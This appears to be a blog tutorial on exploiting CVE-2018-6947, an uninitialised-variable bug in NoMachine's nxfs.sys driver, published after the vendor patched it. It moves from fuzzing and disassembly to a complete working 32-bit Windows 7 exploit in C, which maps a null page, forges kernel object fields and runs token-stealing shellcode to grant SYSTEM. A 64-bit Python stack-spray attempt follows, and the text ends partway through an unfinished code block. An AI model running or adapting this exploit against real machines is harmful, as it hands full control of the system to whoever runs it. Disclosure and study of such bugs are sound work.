NoMachine Un-initialised Variable Privilege Escalation – A fuzz-less exploit tutorial – CVE-2018-6947

Before we start..

In this post we walk through a vulnerability we identified in NoMachine version 6.0.66_2 and lower that can lead to privilege escalation or denial of service. Before we start, we would like to say a massive thank you to the NoMachine team, who were awesome: they acknowledged and triaged our advisory the same day it was sent and had a patch ready within a week. It was a flawless example of how vulnerabilities should be handled.

This post contains the following sections:

  1. Introduction – initial analysis of the device driver & black box attempts at fuzzing.
  2. Static Analysis – walkthrough of our attempt to target the fuzzing & getting a crash.
  3. Exploit Development – walkthrough of developing an exploit for Win7 32bit.
  4. 64bit Exploit Development – attempts at kernel stack spraying and why they failed. Manipulating the uninitialized variable to gain code execution.

This post should show that with minimal knowledge of Windows kernel internals, we can utilise a bit of determination combined with a lot of curiosity to gain a working exploit.

TL;DR

An uninitialized stack variable is passed to ObOpenObjectByPointer as the Object argument, and its value can be an address that user space is able to map. The code path is triggered by first issuing IOCTL 0x222014 with certain parameters to the nxfs device driver, followed by IOCTL 0x222030 to the newly created nxfs-net… device. On 32bit systems this can lead to privilege escalation because the stack variable always holds the same value; on 64bit systems privilege escalation is possible but not 100% reliable.

Introduction

To start with, we will be working in a Windows 7 32bit VM with kernel debugging enabled. Upon downloading and installing NoMachine we noticed a few interesting files in its bin directory; most notably, it installs a driver (nxfs.sys) in bin/drivers/nxdisk. This device driver is responsible for remotely mounting disks. The typical usage is shown here:

It turns out you don’t actually need to mount a remote disk to query this driver and, as it can be read and written to by any user, it’s a decent target for looking to get privilege escalation. We start this post by looking at trying to fuzz the device with IOCTLBF and IOCTLFuzzer, and we’ll see that without static analysis we would never have found this exploit.

To start with, we set up IOCTLFuzzer in “promiscuous” mode, basically not fuzzing anything, and interact with NoMachine to see what IOCTLs are sent. In the ioctlfuzzer.xml config file, we only add an entry to the allow section:

<allow>
    <driver val="nxfs.sys" />
</allow>

The reason we set this entry is because without it we just end up fuzzing everything, which we don’t really want. Anyway, as soon as we try and connect a remote disk we get a load of output:

Note that if you try fuzzing the actual mounting of the disk you’ll get nowhere. We get even more output when reading and writing files, but essentially we only see a few IOCTLs:

Moving on to another popular IOCTL fuzzer, IOCTLBF, we can use knowledge of 1 IOCTL to try and brute force the rest and then fuzz them. Again at this point we’ve not really tried targeting our fuzzing, it’s a pretty naïve approach.

We left that running for a while and it never found any valid IOCTLs. This is basically down to the fact that each IOCTL has a specific set of arguments, and will simply return an error if you don’t pass it the correct values (such as a size at a particular offset). The idea of this section was just to introduce the driver, try and get some low hanging fruit and at least see if it does have some interface we can access from user space. In the next section we drill down into reversing the driver to try and target our fuzzing.
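To see why blind brute forcing has so little to go on, it helps to split a control code into its fields. The following is a minimal Python 3 sketch, assuming the standard CTL_CODE bit layout from the Windows driver headers; the helper name decode_ioctl is ours and is not part of IOCTLBF or IOCTLFuzzer. The two codes used are the ones from the TL;DR.

```python
def decode_ioctl(code):
    """Split a Windows I/O control code into its CTL_CODE fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,  # bits 16-31
        "access": (code >> 14) & 0x3,          # bits 14-15
        "function": (code >> 2) & 0xFFF,       # bits 2-13
        "method": code & 0x3,                  # bits 0-1
    }


for code in (0x222014, 0x222030):
    fields = decode_ioctl(code)
    print(hex(code), {name: hex(value) for name, value in fields.items()})
```

Both codes decode to device type 0x22 (FILE_DEVICE_UNKNOWN) with method 0 (METHOD_BUFFERED), and differ only in the function number (0x805 and 0x80c). Knowing the code is only half the story though: the handler still rejects requests whose buffers do not have the sizes and contents it expects.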

Static Analysis

Loading the driver into IDA and jumping straight to the driver entry function and then sub_1CF86 we have the following block of code. Bear in mind that this is a filesystem driver, and so has to register certain handlers (such as reading and writing).

It turns out that this device driver is a fork of the open source project DokanFS, the source code of which is here: https://github.com/dokan-dev/dokany. I decided to focus on the IoControl code for whatever reason, although SetSecurityInfo, Read and Write etc may also be good targets to look at.

Looking at loc_14F8E, we instantly start seeing a few new IOCTLs, but also some other values of interest. Essentially, this is an IOCTL handler that also checks for certain types of “File”. edi points to an internal structure held by the device driver, and at offset 0x0C it keeps a magic number identifying the type of file. On a base install of NoMachine, the first device created is nxfs-709fd562-36b5-48c6-9952-302da6218061, and with a little debugging we find that it has a magic number of 0x3A44474C. Whenever you call DeviceIoControl with a handle to this device, you will always hit sub_14ADA.

Looking at sub_14ADA we get another set of IOCTLs that it can handle:

Jumping ahead a bit, the IOCTL we want is 0x222014:

sub_1219E is quite interesting. I won’t go over the whole function; the main point is that if you specify the correct values you’ll get a new device that has a new magic value.

As we can see here the input and output buffers we pass to the device need to be certain sizes. It then copies bytes over from our user buffer to the stack.

In the next block these values are then checked: our buffer must contain 0x190 at offset 0 and 1 at offset +4.
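The buffer layout those checks imply can be sketched in a few lines of Python 3. This is only an illustration: the 0x10 input size is the one used by the code later in this post, the 'A' filler is arbitrary, and the function name build_create_request is hypothetical.

```python
import struct

IN_SIZE = 0x10  # input buffer size used by the code later in this post


def build_create_request(fill=b"A"):
    """Build the IOCTL 0x222014 input buffer: 0x190 at offset 0, 1 at offset 4."""
    header = struct.pack("<II", 0x190, 0x1)  # two little-endian dwords
    return header + fill * (IN_SIZE - len(header))


buf = build_create_request()
print(len(buf), buf.hex())
```

Packing both dwords in a single struct.pack call keeps the offsets explicit, and padding to IN_SIZE ensures the buffer is really as long as the size passed alongside it.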

Skipping ahead (a lot), we basically end up creating a new device.

 

The code for this stage is as follows:

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>   // printf
#include <stdlib.h>  // exit

#define DEVICE L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define IOCTL 0x00222014
#define OUT_SIZE 0x90
#define IN_SIZE 0x10

int main()
{
	char inBuff[IN_SIZE];
	char outBuff[OUT_SIZE];

	HANDLE handle = 0;
		
	DWORD returned = 0;
	memset(inBuff, 0x41, IN_SIZE);
	memset(outBuff, 0x43, OUT_SIZE);

	*(ULONG *)inBuff = 0x00000190;
	*(ULONG *)(inBuff + 4) = 0x00000001;
	
	handle = CreateFile(DEVICE,
			GENERIC_READ | GENERIC_WRITE,
			FILE_SHARE_READ | FILE_SHARE_WRITE,
			NULL,
			OPEN_EXISTING,
			FILE_ATTRIBUTE_NORMAL,
			0);

	if (handle == INVALID_HANDLE_VALUE)
	{
		printf("[x] Couldn't open device\n");
		exit(-1);
	}

	int ret = DeviceIoControl(handle,
			IOCTL,
			inBuff,
			IN_SIZE,
			outBuff,
			OUT_SIZE,
			&returned,
			0);
}

What do we get when we run this? Well:

The reason there are three devices with very nearly the same name is that I’ve run that code a few times whilst writing this post. I did play around with running it in an infinite loop, in which case you get a whole load of those devices and my VM started freaking out. If anyone knows of any vulnerabilities involved with arbitrarily creating devices, please let us know.

So at this point we have a new device, and without going into it too much, we have its magic number as 0x3A564342. Back in the IOCTL handler this had a variety of IOCTLs associated with it:

We have:

  1. 0x222008
  2. 0x22200c
  3. 0x222010
  4. 0x22201a
  5. 0x222027
  6. 0x22202c
  7. 0x222030

Note that we only saw the first two of these control codes when fuzzing with IOCTLFuzzer. Let’s see what happens if we try and fuzz the “nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}” device with IOCTLBF. We start with 0x222030 and instantly get a crash:

With hindsight set at 20/20, we know that the first argument to ObOpenObjectByPointer is supposed to be the object’s address. 0x06000000 doesn’t look quite right, and the access violation occurred due to an invalid read. At first we didn’t know if this was exploitable, and in the next section we will walk through a series of “I wonder what happens if…” experiments which led us to a privilege escalation exploit.

Exploit Development

We’ve seen that we get an invalid read access violation, so the next logical step is to do some root cause analysis, starting with the handler for the vulnerable control code (0x222030), sub_1633E. This function has something to do with getting a handle to a token object, and can only be called from user mode.

It then does some length checking on the input and output buffer sizes:

It acquires a spinlock and does some looping, and eventually calls ObOpenObjectByPointer:

Remember that the first argument (esi) is the one we think is incorrect. Moving backwards, we see that esi is the second argument to this function:

It turns out that the second argument is actually the I/O request packet (IRP):

One value in particular looks interesting here, 0x06000000 at offset 0x24 (little endian). Just before the call to ObOpenObjectByPointer we have the following block:

Notice how a value is copied into esi from esi+0x24. It doesn’t matter how many times this function is called, it will always be 0x06000000, which is the dword starting at IRP.Cancel.
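To make the little-endian point concrete, here is a small Python 3 sketch of how four one-byte fields read as a single dword produce 0x06000000. The field names and order at offsets 0x24 to 0x27 are our assumption about the Windows 7 x86 _IRP layout, and the byte values are simply chosen to reproduce the value we observed; neither is taken from the driver.

```python
import struct

# Assumed one-byte fields at _IRP+0x24 .. +0x27 on Windows 7 x86.
# The values are illustrative, picked to match the dword seen in the debugger.
irp_bytes = bytes([
    0x00,  # +0x24 Cancel
    0x00,  # +0x25 CancelIrql
    0x00,  # +0x26 ApcEnvironment
    0x06,  # +0x27 AllocationFlags
])

# "mov esi, [esi+24h]" reads all four bytes as one little-endian dword.
(value,) = struct.unpack("<I", irp_bytes)
print(hex(value))
```

The byte at the highest address becomes the most significant byte of the dword, which is why a small value in the last field shows up as 0x06000000 rather than 0x00000006.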

Being relatively new to Windows kernel exploitation, it took us a while to figure out how to exploit this issue. We know that 0x06000000 is mappable, so we thought: let’s see what happens when we map that address, do we get a new crash? We use the following code to first create the vulnerable device, and then issue the vulnerable IOCTL to it (the first part of the code is cut out because it hasn’t changed):

#include "stdafx.h"
#include <Windows.h>

#define DEVICE L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define DEVICE2 L"\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
#define IOCTL 0x00222014
#define IOCTL2 0x00222030
#define OUT_SIZE 0x90
#define IN_SIZE 0x10

int main()
{
	<...Snip...>
	HMODULE module = LoadLibraryA("ntdll.dll");
	PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, "NtAllocateVirtualMemory");
	
	SIZE_T size = 0x1000;
	PVOID address1 = (PVOID)0x05ffff00;
	
	NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(),
		&address1,
		0,
		&size,
		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE);
	
	if (allocStatus != 0)
	{
		printf("[x]Couldnt alloc page\n");
		exit(-1);
	}
	
	//create the nxfs-net device.
	int ret = DeviceIoControl(handle,
			IOCTL,
			inBuff,
			IN_SIZE,
			outBuff,
			OUT_SIZE,
			&returned,
			0);
			
	HANDLE handle2 = CreateFile(DEVICE2,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		0);

	char inBuff2[0x30];
	char outBuff2[0x30];

	ret = DeviceIoControl(handle2,
		IOCTL2,
		inBuff2,
		0x30,
		outBuff2,
		0x30,
		&returned,
		0);
}
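A note on the allocation base in the code above: asking for 0x1000 bytes at 0x05ffff00 gives us memory on both sides of 0x06000000, which matters because the kernel reads at negative offsets from the object pointer. The Python 3 sketch below works through the arithmetic, assuming the base is rounded down and the end rounded up to 4 KB page boundaries; that rounding behaviour is our assumption and not something we verified in the kernel.

```python
PAGE_SIZE = 0x1000  # assumed page size


def committed_range(base, size, page=PAGE_SIZE):
    """Return the page-aligned [start, end) range covering base..base+size."""
    start = base & ~(page - 1)
    end = (base + size + page - 1) & ~(page - 1)
    return start, end


start, end = committed_range(0x05FFFF00, 0x1000)
print(hex(start), hex(end))

# The object pointer and the bytes just below it are both inside the range.
for address in (0x06000000, 0x06000000 - 0x18):
    print(hex(address), start <= address < end)
```

Under that assumption the request spans two pages, 0x05fff000 to 0x06000fff, so both the fake object at 0x06000000 and the header bytes immediately below it are backed by memory we control.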

Interestingly enough, we don’t get any crashes, nor do we if we fill the memory with random data. Determined to carry on, we decided to have a look at what exactly ObOpenObjectByPointer (and the other related functions it calls) does. Setting a breakpoint on the call at nxfs+0x6516, we first hit ObOpenObjectByPointer. It turns out this function just pushes a load of arguments for another function:

nt!ObOpenObjectByPointer:
82c8ca78 8bff mov edi,edi
82c8ca7a 55 push ebp
82c8ca7b 8bec mov ebp,esp
82c8ca7d ff7520 push dword ptr [ebp+20h]
82c8ca80 6844666c74 push 746C6644h ;"Dflt"
82c8ca85 ff751c push dword ptr [ebp+1Ch]
82c8ca88 ff7518 push dword ptr [ebp+18h]
82c8ca8b ff7514 push dword ptr [ebp+14h]
82c8ca8e ff7510 push dword ptr [ebp+10h]
82c8ca91 ff750c push dword ptr [ebp+0Ch]
82c8ca94 ff7508 push dword ptr [ebp+8] ;0x06000000
82c8ca97 e8f74effff call nt!ObOpenObjectByPointerWithTag (82c81993)
82c8ca9c 5d pop ebp
82c8ca9d c21c00 ret 1Ch
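The pushed constant 746C6644h is a four-character tag stored little-endian, so it reads naturally once the bytes are laid out in memory order. A quick Python 3 check (the helper name tag_to_text is ours):

```python
import struct


def tag_to_text(tag):
    """Render a 32-bit tag as the ASCII string it forms in memory."""
    return struct.pack("<I", tag).decode("ascii")


print(tag_to_text(0x746C6644))
```

This prints Dflt, the default tag that ObOpenObjectByPointer hands to its WithTag counterpart.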

ObOpenObjectByPointerWithTag then calls:

82c81993 mov edi,edi
82c81995 push ebp
82c81996 mov ebp,esp
82c81998 and esp,0FFFFFFF8h
82c8199b 81ec44010000 sub esp,144h
82c819a1 a1948ab682 mov eax,dword ptr [nt!__security_cookie (82b68a94)]
<…Snip…>
82c819cc 57 push edi ;NULL
82c819cd 53 push ebx ;0x06000000
82c819ce e8e7cee3ff call nt!ObReferenceObjectByPointerWithTag (82abe8ba)

And next, in ObReferenceObjectByPointerWithTag we start getting some results:

nt!ObReferenceObjectByPointerWithTag:
82abe8ba mov edi,edi
82abe8bc push ebp
82abe8bd mov ebp,esp
82abe8bf mov eax,dword ptr [ebp+10h]
82abe8c2 push esi
82abe8c3 mov esi,dword ptr [ebp+8] ;esi = 0x06000000
82abe8c6 add esi,0FFFFFFE8h ;esi -= 0x18 (24 bytes)
82abe8c9 test eax,eax
82abe8cb jne nt!ObReferenceObjectByPointerWithTag+0x1f (82abe8d9)
82abe8cd cmp byte ptr [ebp+14h],al
82abe8d0 je nt!ObReferenceObjectByPointerWithTag+0x2c (82abe8e6)
82abe8d2 mov eax,0C0000024h
82abe8d7 jmp nt!ObReferenceObjectByPointerWithTag+0x50 (82abe90a)
82abe8d9 movzx ecx,byte ptr [esi+0Ch] ;ecx = byte at 0x06000000-0xc = byte at 0x05fffff4
82abe8dd cmp dword ptr nt!ObTypeIndexTable (82b81ee0)[ecx*4],eax ********
82abe8e4 jmp nt!ObReferenceObjectByPointerWithTag+0x16 (82abe8d0)
82abe8e6 push ebx

The interesting part here is the ObTypeIndexTable, we know from our previous Windows kernel exploit this is a table into the different object types:

Notice that the value held in eax is the 5th index into the table (which is a Token object), so we decide to see what happens when we set 0x05fffff4 to 5. We don’t exit, which is good, instead we end up hitting this code which sets a lock:

82abe8dd cmp dword ptr nt!ObTypeIndexTable (82b81ee0)[ecx*4],eax
<…Snip…>
82abe903 lock xadd dword ptr [esi],ebx ds:0023:05ffffe8=43434343
82abe907 xor eax,eax
82abe909 pop ebx
82abe90a pop esi
82abe90b pop ebp
82abe90c ret 14h
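The addresses in these listings all follow from two constants in the disassembly: the 0x18 subtracted from the object pointer and the 0xC added before the type index is read. A short Python 3 sketch of that arithmetic (the constant names are ours, chosen for readability):

```python
OBJECT = 0x06000000       # the bogus Object argument
HEADER_SIZE = 0x18        # from "add esi,0FFFFFFE8h"
TYPE_INDEX_OFFSET = 0x0C  # from "movzx ecx,byte ptr [esi+0Ch]"

header = OBJECT - HEADER_SIZE                 # start of the object header
type_index_addr = header + TYPE_INDEX_OFFSET  # byte used to index ObTypeIndexTable

print(hex(header), hex(type_index_addr))
```

The header address 0x05ffffe8 is exactly the operand of the lock xadd above, and 0x05fffff4 is the byte we set to 5.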

We return from ObReferenceObjectByPointerWithTag, and let execution continue until we get another access violation:

nt!SepTokenDeleteMethod:
82c9a513 mov edi,edi
82c9a515 push ebp
82c9a516 mov ebp,esp
82c9a518 sub esp,10h
82c9a51b push ebx
82c9a51c push esi
82c9a51d mov esi,dword ptr [ebp+8] ;esi = 0x06000000
82c9a520 test byte ptr [esi+0ACh],20h
82c9a527 push edi
82c9a528 jne nt!SepTokenDeleteMethod+0x4f (82c9a562) ;taken if bit 0x20 of the byte at 0x060000ac is set
82c9a52a mov ecx,dword ptr [esi+0BCh]
82c9a530 lea edx,[ecx+14h]
82c9a533 mov eax,dword ptr [edx] ds:0023:00000014=????????
82c9a535 mov dword ptr [ebp+8],eax
82c9a538 cmp eax,1
82c9a53b je nt!SepTokenDeleteMethod+0x3a (82c9a54d)
<…Snip…>
82c9a562 mov ecx,dword ptr [esi+1DCh] ;grab some pointer from 0x060001dc
82c9a568 xor ebx,ebx
82c9a56a cmp ecx,ebx ;check it isn’t null
82c9a56c je nt!SepTokenDeleteMethod+0x60 (82c9a573)
82c9a56e call nt!ObfDereferenceObject (82ab43f3) ***We want this code path
82c9a573 cmp byte ptr [esi+73h],2

We decide to set 0x060000ac to 0x20 and, instead of running the code again, simply flip eip around a bit and carry on. When we get to SepTokenDeleteMethod+0x4f (82c9a562), we see that we can’t have a null pointer at 0x060001dc; it clearly has to be a valid pointer, so we decide to put in a value we know is mapped in memory, 0x05ffff00.

At this point, our code has the following values at certain offsets:

*(ULONG *)0x05fffff4 = 5;
*(ULONG *)0x060000ac = 0x20;
*(ULONG *)0x060001dc = 0x05ffff00;

This gives us the following new bugcheck:

Looking at the call stack, the bugcheck occurred in ObfDereferenceObjectWithTag:

82ab4407 833d0c64b78200 cmp dword ptr [nt!ObpTraceFlags (82b7640c)],0
82ab440e push ebx
82ab440f push esi
82ab4410 push edi
82ab4411 mov edi,ecx
82ab4413 lea esi,[edi-18h] ;esi = 0x05ffff00 – 0x18
82ab4416 je nt!ObfDereferenceObjectWithTag+0x22 (82ab4429)
82ab4418 test byte ptr [esi+0Dh],1
82ab441c je nt!ObfDereferenceObjectWithTag+0x22 (82ab4429)
<…Snip…>
82ab4429 mov eax,esi
82ab442b or ebx,0FFFFFFFFh
82ab442e lock xadd dword ptr [eax],ebx ;dereference count
82ab4432 dec ebx
82ab4433 jne nt!ObfDereferenceObjectWithTag+0x97 (82ab449f)
82ab4435 mov eax,dword ptr [esi+4]
82ab4438 test eax,eax
82ab443a je nt!ObfDereferenceObjectWithTag+0x4b (82ab4453)
82ab443c push eax
82ab443d movzx eax,byte ptr [edi-0Ch]
82ab4441 push 1
82ab4443 push edi
82ab4444 push dword ptr nt!ObTypeIndexTable (82b81ee0)[eax*4]
82ab444b push 18h
82ab444d call nt!KeBugCheckEx (82b1ad62)

Put simply, if the value at 0x05ffff00 – 0x18 is 0, then we end up hitting the bugcheck call, so the simplest thing to do is to set it to 1. Skipping forward slightly, the final offset we need to set is 0x05ffff00 – 0x14, which needs to equal 0. Our code then sets the following offsets:

*(ULONG *)0x05fffff4 = 5;
*(ULONG *)0x060000ac = 0x20;
*(ULONG *)0x060001dc = 0x05ffff00;
*(ULONG *)(0x05ffff00 - 0x18) = 1;
*(ULONG *)(0x05ffff00 - 0x14) = 0;

And running it gives us yet another access violation, but this one looks a lot more promising (note that ebx=0). If we mapped a null page and set 0x64 to some function, then the check at 82C624EF would fail.

The easiest way to test our theory is to simply set 0x64 to point to a function in userspace that sets a breakpoint. For example:

__declspec(naked) VOID kernel_breakpoint()
{
	__asm {
		int 3
	}
}

We hit our breakpoint, but there’s one main thing to point out: this has happened during the exit of our process. We tried various ways of triggering ObpRemoveObjectRoutine (such as closing handles) but to no avail. What this means is that when we write our shellcode, we need to steal a SYSTEM token and put it in the parent process’s token (the parent being cmd.exe, from which we launched the exploit). The other problem that took a while to figure out was where to return: if we return to ObpRemoveObjectRoutine+59, we end up calling ObpFreeObject, which causes more issues.

It turns out that after a lot of trial and error, we can actually do a really hacky fix. We can return to the second call to ObpRemoveObjectRoutine, fix the stack, and change the return address a little bit so we skip over the call to ObpFreeObject.

The shellcode is relatively simple:

__declspec(naked)VOID TokenStealingShellcode()
{
	__asm{
	int 3;
	xor eax, eax;
	mov eax, fs:[eax + KTHREAD_OFFSET];
	mov eax, [eax + EPROCESS_OFFSET];
	mov esi, [eax + PARENT_PID]    ; Get parent pid 

              ;Search for the parent process
	Loop1:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp esi, [eax + PID_OFFSET];
		jne Loop1;
	
	mov ecx, eax;
	mov ebx, [eax + TOKEN_OFFSET];  
	mov edx, SYSTEM_PID;

	;Look for a SYSTEM process
               Search:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp[eax + PID_OFFSET], edx;
		jne Search;
	
              ;Steal its token, placing it in the Parents token.
	mov edx, [eax + TOKEN_OFFSET];
	mov[ecx + TOKEN_OFFSET], edx;
             }
}

Again, we place an int 3 breakpoint at the start of the code so that it’s easier to debug.

As we can see from the figure above, our shellcode is at a place where it should return. Looking at the call stack again, we need to get back to ObpRemoveObjectRoutine, but to the second stack frame, not the one that called our shellcode. To do this we need to fix the stack by adding 0x58 to it. This then lands us in the call to ObpFreeObject:

82c624fd               push    eax
82c624fe               call    dword ptr [edi+64h]
82c62501              call    nt!ObpFreeObject (82c62512)
82c62506              pop     edi

However, if we just add 5 to the return address, we skip past it and exit cleanly. It’s not pretty, but it works consistently. We add the following stub to the end of the shellcode:

add esp, 0x58;
add[esp], 5;
ret 4;
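The 5 in that stub is not a magic number; it is the length of the call instruction we want to step over, and it can be read straight off the listing above. A tiny Python 3 check, using only the addresses shown there (the variable names are ours):

```python
CALL_FREE_OBJECT = 0x82C62501  # address of "call nt!ObpFreeObject"
NEXT_INSTRUCTION = 0x82C62506  # address of the "pop edi" that follows it

# Length of the call instruction, taken from the gap between the two addresses.
call_length = NEXT_INSTRUCTION - CALL_FREE_OBJECT
print(call_length, hex(CALL_FREE_OBJECT + call_length))
```

Because these addresses come from one particular kernel build, the skip distance should be re-derived from the disassembly on any other build rather than assumed.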

Putting it all together, we get the following code, and a SYSTEM shell:

#include "stdafx.h"
#include <Windows.h>

#define DEVICE L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define DEVICE2 L"\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
#define IOCTL 0x00222014
#define IOCTL2 0x00222030
#define OUT_SIZE 0x90
#define IN_SIZE 0x10

#define KTHREAD_OFFSET 0x124
#define EPROCESS_OFFSET 0x050
#define PID_OFFSET 0x0b4
#define FLINK_OFFSET 0x0b8
#define TOKEN_OFFSET 0x0f8
#define SYSTEM_PID 0x004
#define PARENT_PID 0x140

__declspec(naked)VOID TokenStealingShellcode()
{
	__asm{
	xor eax, eax;
	mov eax, fs:[eax + KTHREAD_OFFSET];
	mov eax, [eax + EPROCESS_OFFSET];
	mov esi, [eax + PARENT_PID]; Get parent pid 

	Loop1:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp esi, [eax + PID_OFFSET];
		jne Loop1;
	
	mov ecx, eax;
	mov ebx, [eax + TOKEN_OFFSET];
	mov edx, SYSTEM_PID;

	Search:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp[eax + PID_OFFSET], edx;
		jne Search;
	
	mov edx, [eax + TOKEN_OFFSET];
	mov[ecx + TOKEN_OFFSET], edx;
	add esp, 0x58;
	add[esp], 5;
	ret 4;
	}
}

typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG ZeroBits,
	PULONG AllocationSize,
	ULONG AllocationType,
	ULONG Protect
	);

typedef NTSTATUS(WINAPI *PNtFreeVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	PULONG RegionSize,
	ULONG FreeType
	);

int main()
{
	HMODULE module = LoadLibraryA("ntdll.dll");
	PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, "NtAllocateVirtualMemory");
	PNtFreeVirtualMemory FreeMemory = (PNtFreeVirtualMemory)GetProcAddress(module, "NtFreeVirtualMemory");

	SIZE_T size = 0x1000;
	PVOID address1 = (PVOID)0x05ffff00;
	

	NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(),
		&address1,
		0,
		&size,
		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE);
	
	if (allocStatus != 0)
	{
		printf("[x]Couldnt alloc page\n");
		exit(-1);
	}
	printf("[+] Allocated address at %p\n", address1);
	*(ULONG *)0x05fffff4 = 5;
	*(ULONG *)0x060000ac = 0x20;
	*(ULONG *)0x060001dc = 0x05ffff00;
	*(ULONG *)(0x05ffff00 - 0x18) = 1;
	*(ULONG *)(0x05ffff00 - 0x14) = 0;
	
	PVOID address2 = (PVOID)0x1;
	SIZE_T size2 = 0x1000;
	
	allocStatus = AllocMemory(GetCurrentProcess(),
		&address2,
		0,
		&size2,
		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE);

	if (allocStatus != 0)
	{
		printf("[x]Couldnt alloc page2\n");
		exit(-1);
	}
	*(ULONG *)0x64 = (ULONG)&TokenStealingShellcode;
	printf("[+] Mapped null page\n");

	char inBuff[IN_SIZE];
	char outBuff[OUT_SIZE];

	HANDLE handle = 0;
		
	DWORD returned = 0;
	memset(inBuff, 0x41, IN_SIZE);
	memset(outBuff, 0x43, OUT_SIZE);

	*(ULONG *)inBuff = 0x00000190;
	*(ULONG *)(inBuff + 4) = 0x00000001;
	
	printf("[+] Creating nxfs-net... device through IOCTL 222014\n");
	handle = CreateFile(DEVICE,
			GENERIC_READ | GENERIC_WRITE,
			FILE_SHARE_READ | FILE_SHARE_WRITE,
			NULL,
			OPEN_EXISTING,
			FILE_ATTRIBUTE_NORMAL,
			0);

	if (handle == INVALID_HANDLE_VALUE)
	{
		printf("[x] Couldn't open device\n");
		exit(-1);
	}

	int ret = DeviceIoControl(handle,
			IOCTL,
			inBuff,
			IN_SIZE,
			outBuff,
			OUT_SIZE,
			&returned,
			0);

	HANDLE handle2 = CreateFile(DEVICE2,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		0);

	char inBuff2[0x30];
	char outBuff2[0x30];

	printf("[+] Triggering exploit...");

	ret = DeviceIoControl(handle2,
		IOCTL2,
		inBuff2,
		0x30,
		outBuff2,
		0x30,
		&returned,
		0);
	
	return 0;
}

64-bit Exploit Development

It turns out that in our 32 bit exploit we got extremely lucky, given that the object argument passed to ObOpenObjectByPointer was something we could map in userspace. In general, when we want to exploit uninitialized stack variables in kernel space, we need to spray the stack. The idea is that if you can call a kernel space function that copies a large amount of user controllable values into a kernel stack buffer, then you may be able to control the uninitialized variable. A good introduction to this is given by j00ru (http://j00ru.vexillium.org/?p=769). We fire up a Windows 7 64bit VM and see whether we can control the uninitialized variable, using the following python code:

from ctypes import *
from ctypes.wintypes import *
import struct
import sys
import os

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
STATUS_INVALID_HANDLE = 0xC0000008

def str_to_pchar(string):
	pString = c_char_p(string)
	return pString

def get_handle(device_name):
	return windll.kernel32.CreateFileA(device_name,
		GENERIC_READ | GENERIC_WRITE,
		0,
		None,
		OPEN_EXISTING,
		0,
		None)


handle = get_handle("\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061")

#CreateFileA signals failure with INVALID_HANDLE_VALUE (-1), not an NTSTATUS code
if handle == -1:
	print "[x] Couldn't get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
	sys.exit(-1)

#if we have a valid handle, we now need to send ioctl 0x222014
#this creates a new device for which ioctl 0x222030 can be sent
in_buff = struct.pack("<I", 0x190) + struct.pack("<I", 0x1) + "A"*8 #pad to the 0x10 bytes passed below
in_buff = str_to_pchar(in_buff) 
out_buff = str_to_pchar("A"*0x90) 
bytes_ret = c_ulong() 
ret = windll.kernel32.DeviceIoControl(handle, 0x222014, in_buff, 0x10, out_buff, 0x90, byref(bytes_ret), 0) 

if ret == 0: 
	print "[x] IOCTL 0x222014 failed" 
	sys.exit(-1) 
	
print "[+] IOCTL 0x222014 returned success"

#get a handle to the next device for which we can send the vulnerable ioctl. 
print "[+] Getting handle to \\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}" 
handle = get_handle("\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}") 

if handle == -1: #INVALID_HANDLE_VALUE
	print "[x] Couldn't get handle"
	sys.exit(-1)
	
print "[+] Spraying stack" 

spray_buff = str_to_pchar("C"*2048*8) 
windll.ntdll.NtMapUserPhysicalPages(None, 1024, spray_buff) 
in_buff = str_to_pchar("A"*0x30) 
out_buff = str_to_pchar("B"*0x30) 
windll.kernel32.DeviceIoControl(handle, 0x222030, in_buff, 0x30, out_buff, 0x30, byref(bytes_ret), 0)
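As a sanity check on the spray in the script above, we can work out how many bytes the kernel is asked to read. The Python 3 sketch below assumes that the third argument of NtMapUserPhysicalPages is an array of pointer-sized entries, one per page, which is our reading of its commonly published prototype; the constant names are ours.

```python
ENTRIES = 1024    # NumberOfPages passed by the script
POINTER_SIZE = 8  # bytes per entry on a 64bit system (assumed)

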